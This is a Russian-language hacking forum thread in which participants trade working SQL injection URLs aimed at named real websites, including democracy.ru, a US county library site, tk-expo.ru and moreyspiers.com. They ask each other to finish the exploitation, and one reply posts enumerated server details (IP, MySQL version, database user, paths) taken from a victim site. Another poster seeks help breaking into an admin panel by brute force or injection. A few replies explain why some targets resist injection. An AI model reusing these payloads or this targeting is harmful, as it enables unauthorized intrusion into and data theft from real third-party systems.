http://www.democracy.ru/article.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+176,20000-- помогите это докрутить =)) уже 2 часа епусь)) все таблицы перебрал и ничего =((
А чего там перебирать-то? Вот все данные, всего 244 таблицы, есть и интересные: PHP: ============================= www.democracy.ru 75.101.142.224 ============================= ------- Версия MySQL: 5.0.45 ------- Имя базы: iesd ------- Юзер: alex@localhost ------- @@basedir: /usr/ ------- @@datadir: /var/lib/mysql/ ------- @@tmpdir: /tmp/ ------- @@version_compile_os: redhat-linux-gnu ------- Список таблиц сюда не влез, скачать здесь можно: http://slil.ru/26513292 дел на 4 минуты
Не могли бы помочь глянуть в админку есть ли что нибкудь?? http://la2sfer.ru/admin/ что с ней можно сделать? брут\инъеция... еще вот что нашел: http://la2sfer.ru/data/admin http://la2sfer.ru/news (возможжно тоже пригодится, хотя search.php предусмотрительно удален)
Попытка привести вектор к скалярному типу. По-идее массив должен был привестись к int(1), но почему-то у них NOT_A_SCALAR_PLACEHOLDER_0. Видимо используют самописные функции для приведения к целочисленному типу. Врядли там есть норм скуль-инъект.
Вот нашел скулю роскрутил чуть чуть дальше начались траблы подставляю вместо 14 version() выдает ошыбку. Решил перевести в чар получился такой запрос вместо 14 терь стоит version(). Как узнать версию???
вот так Code: http://www.niobraracountylibrary.org/obituaries/?id=2769%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,%2013,unhex(hex(version())),15,16,17/*
спс вот начал подбирать имена таблиц и тут ввел mysql.user и ответ получил не такой как всегда: MySQL Error: Access denied for user 'dsturman'@'208.113.192.0/255.255.224.0' to database 'mysql' может тут какая-то привязка по ИР
http://hackzona.net/index.php?id=p=authorization&[email protected]&auth_password=%5C%22&auth_automatic=off http://hackzona.net/?id=1'&s=silvermail.info вообще хз что значит Code: Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/users/s/slavon-x86/docs/sql/main.php on line 14
При добавлений задачи на http://cronjob.ru появилась следующая ошибка: Code: Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 7 in /sql/hosts/cronjob.ru/act.php on line 54 Интересно что это значит.
NOT_A_SCALAR_PLACEHOLDER_0 явно свидетельствует об использовании библиотеки для работы с БД, заменяющая так называемые плейсхолдеры ? в SQL-запросах на те данные, которые указаны в качестве аргументов к функции выполнения запросов. Данные в аргументах обрабатываются в соответствии с типом, что исключает возможность проведения SQL-инъекций. В данном случае используется DbSimple от Дмитрия Котерова, уязвимости здесь нет. Значит MySQL вернул пустой результат, т.е. в коде отсутствует проверка с помощью функции mysql_num_rows() все просто - у текущего пользователя dsturman нет доступа к базе данных mysql на лицо ошибка в логике скрипта, однако SQL-инъекцию здесь вряд ли можно провести, так как данные обрабатываются функцией preg_match(). Об этом свидетельствует ошибка : preg_match() expects parameter 2 to be string, array given при передаче массива в параметре id: http://hackzona.net/?id[]=1&s=silvermail.info
Code: http://www.tk-expo.ru/news/?id=-8+GROUP+BY+9-- кол-во столбцов = 9 inj не получается.. кто сделает отпишите какой должен быть запрос для inj
2z00man Code: http://www.tk-expo.ru/news/?id=8+and+51=ascii(substring(version(),1,1))-- 3я ветка мускула.
http://www.moreyspiers.com/gallery.php?cat_id=-15'+union+select+1,concat_ws(0x3a,User(),Database(),Version()),3,4,5,6,7,8+--+ Не торопись
